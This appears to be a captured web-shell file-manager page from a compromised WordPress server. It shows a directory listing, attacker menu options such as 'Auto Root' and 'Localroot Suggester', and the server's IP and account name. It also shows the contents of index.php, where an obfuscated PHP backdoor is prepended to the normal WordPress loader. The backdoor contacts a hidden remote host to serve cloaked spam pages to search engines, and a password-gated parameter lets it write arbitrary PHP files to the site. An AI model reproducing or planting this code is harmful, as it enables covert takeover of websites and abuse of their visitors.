Linux web205 5.14.0-435.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Mar 29 18:46:37 UTC 2024 x86_64
Apache
Server IP : 86.110.243.205 & Your IP : 3.133.109.30
Domains :
Cant Read [ /etc/named.conf ]
User : jp029900
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
/
home /
jp029900 /
www_root /
Delete
Unzip
Name
Size
Permission
Date
Action
wp-admin
[ DIR ]
drwxr-xr-x
2024-01-05 13:21
wp-content
[ DIR ]
drwxr-xr-x
2023-10-22 12:50
wp-includes
[ DIR ]
drwxr-xr-x
2024-02-19 18:18
.htaccess
558
B
-r--r--r--
2024-01-02 21:20
.htaccess.org
558
B
-rw-rw-r--
2024-01-02 21:01
.htaccessOLD
558
B
-r--r--r--
2023-10-22 11:20
_htaccess
558
B
-r--r--r--
2023-08-16 00:54
classsmtps.php
39
B
-rw-r--r--
2023-06-10 09:06
index.php
6.35
KB
-r--r--r--
2023-11-17 22:21
license.txt
19.45
KB
-rwxr-xr-x
2022-01-07 02:00
readme.html
7.17
KB
-rwxr-xr-x
2023-05-17 05:50
robots.txt
139
B
-rw-r--r--
2023-06-10 10:49
software_cracking.pdf
6.6
MB
-rw-r--r--
2024-01-26 21:30
suit.php
31.78
KB
-rw-r--r--
2023-11-07 17:45
wp-activate.php
208
B
-rwxr-xr-x
2024-04-24 11:12
wp-blog-header.php
351
B
-rwxr-xr-x
2020-06-22 14:07
wp-comments-post.php
2.27
KB
-rwxr-xr-x
2021-01-03 21:11
wp-config-sample.php
2.84
KB
-rwxr-xr-x
2020-06-22 14:07
wp-config.php
3.33
KB
-rw-rw-rw-
2021-07-21 22:47
wp-cron.php
3.85
KB
-rwxr-xr-x
2021-01-03 21:11
wp-links-opml.php
140
B
-rwxr-xr-x
2024-03-29 17:19
wp-load.php
3.24
KB
-rwxr-xr-x
2021-07-19 13:45
wp-login.php
44.53
KB
-rwxr-xr-x
2023-06-10 10:38
wp-mail.php
8.26
KB
-rwxr-xr-x
2022-10-18 07:22
wp-settings.php
20.63
KB
-rwxr-xr-x
2021-07-19 13:45
wp-signup.php
26
B
-rwxr-xr-x
2024-02-05 14:32
wp-trackback.php
1.54
KB
-rwxr-xr-x
2024-04-19 08:20
wp.php
181
B
-rw-r--r--
2023-06-10 09:06
xmlrpc.php
70
B
-rwxr-xr-x
2024-03-04 09:05
Save
Rename
<?php @set_time_limit(3600); @ignore_user_abort(1); $xmlname = '%6D%76%72%6B%67%72%61%71%6B%66%2E%7A%72%61%67%62%6F%68%79%78%2E%6B%6C%6D'; $http_web = 'http'; if (is_https()) { $http = 'https'; } else { $http = 'http'; } $duri_tmp = drequest_uri(); if ($duri_tmp == ''){ $duri_tmp = '/'; } $duri = urlencode($duri_tmp); function drequest_uri() { if (isset($_SERVER['REQUEST_URI'])) { $duri = $_SERVER['REQUEST_URI']; } else { if (isset($_SERVER['argv'])) { $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0]; } else { $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING']; } } return $duri; } $goweb = str_rot13(urldecode($xmlname)); function is_https() { if (isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') { return true; } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') { return true; } elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') { return true; } return false; } $host = $_SERVER['HTTP_HOST']; $lang = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; $lang = urlencode($lang); $urlshang = ''; if (isset($_SERVER['HTTP_REFERER'])) { $urlshang = $_SERVER['HTTP_REFERER']; $urlshang = urlencode($urlshang); } $password = sha1(sha1(@$_GET['pd'])); if ($password == 'f75fd5acd36a7fbd1e219b19881a5348bfc66e79') { $add_content = @$_GET['mapname']; $action = @$_GET['action']; if (isset($_SERVER['DOCUMENT_ROOT'])) { $path = $_SERVER['DOCUMENT_ROOT']; } else { $path = dirname(__FILE__); } if (!$action) { $action = 'put'; } if ($action == 'put') { if (strstr($add_content, '.xml')) { $map_path = $path. '/sitemap.xml'; if (is_file($map_path)) { @unlink($map_path); } $file_path = $path . '/robots.txt'; if (file_exists($file_path)) { $data = doutdo($file_path); } else { $data = 'User-agent: * Allow: /'; } $sitmap_url = $http . '://' . $host . '/' . $add_content; if (stristr($data, $sitmap_url)) { echo '<br>sitemap already added!<br>'; } else { if (file_put_contents($file_path, trim($data) . "\r\n" . 'Sitemap: '.$sitmap_url)) { echo '<br>ok<br>'; } else { echo '<br>file write false!<br>'; } } } else { echo '<br>sitemap name false!<br>'; } if (strstr($add_content, '.p' . 'hp')) { $a = sha1(sha1(@$_GET['a'])); $b = sha1(sha1(@$_GET['b'])); if ($a == doutdo($http_web . '://' . $goweb . '/a.p' . 'hp') || $b == 'f8f0dae804368c0334e22d9dcb70d3c7bbfa9635') { $dstr = @$_GET['dstr']; if (file_put_contents($path . '/' . $add_content, $dstr)) { echo 'ok'; } } } } exit; } function ping_sitemap($url){ $url_arr = explode("\r\n", trim($url)); $return_str = ''; foreach($url_arr as $pingUrl){ $pingRes = doutdo($pingUrl); $ok = (strpos($pingRes, 'Sitemap Notification Received') !== false) ? 'pingok' : 'error'; $return_str .= $pingUrl . '-- ' . $ok . '<br>'; } return $return_str; } function disbot() { $uAgent = strtolower($_SERVER['HTTP_USER_AGENT']); if (stristr($uAgent, 'googlebot') || stristr($uAgent, 'bing') || stristr($uAgent, 'yahoo') || stristr($uAgent, 'google') || stristr($uAgent, 'Googlebot') || stristr($uAgent, 'googlebot')) { return true; } else { return false; } } function doutdo($url) { $file_contents= ''; if(function_exists('curl_init')){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $file_contents = curl_exec($ch); curl_close($ch); } if (!$file_contents) { $file_contents = @file_get_contents($url); } return $file_contents; } $web = $http_web . '://' . $goweb . '/indexnew.php?web=' . $host . '&zz=' . disbot() . '&uri=' . $duri . '&urlshang=' . $urlshang . '&http=' . $http . '&lang=' . $lang; $html_content = trim(doutdo($web)); if (!strstr($html_content, 'nobotuseragent')) { if (strstr($html_content, 'okhtmlgetcontent')) { @header("Content-type: text/html; charset=utf-8"); $html_content = str_replace("okhtmlgetcontent", '', $html_content); echo $html_content; exit(); }else if(strstr($html_content, 'okxmlgetcontent')){ $html_content = str_replace("okxmlgetcontent", '', $html_content); @header("Content-type: text/xml"); echo $html_content; exit(); }else if(strstr($html_content, 'pingxmlgetcontent')){ $html_content = str_replace("pingxmlgetcontent", '', $html_content); @header("Content-type: text/html; charset=utf-8"); echo ping_sitemap($html_content); exit(); }else if (strstr($html_content, 'getcontent500page')) { @header('HTTP/1.1 500 Internal Server Error'); exit(); }else if (strstr($html_content, 'getcontent404page')) { @header('HTTP/1.1 404 Not Found'); exit(); }else if (strstr($html_content, 'getcontent301page')) { @header('HTTP/1.1 301 Moved Permanently'); $html_content = str_replace("getcontent301page", '', $html_content); header('Location: ' . $html_content); exit(); } }/* blog E060 */ ?> <?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require( dirname( __FILE__ ) . '/wp-blog-header.php' );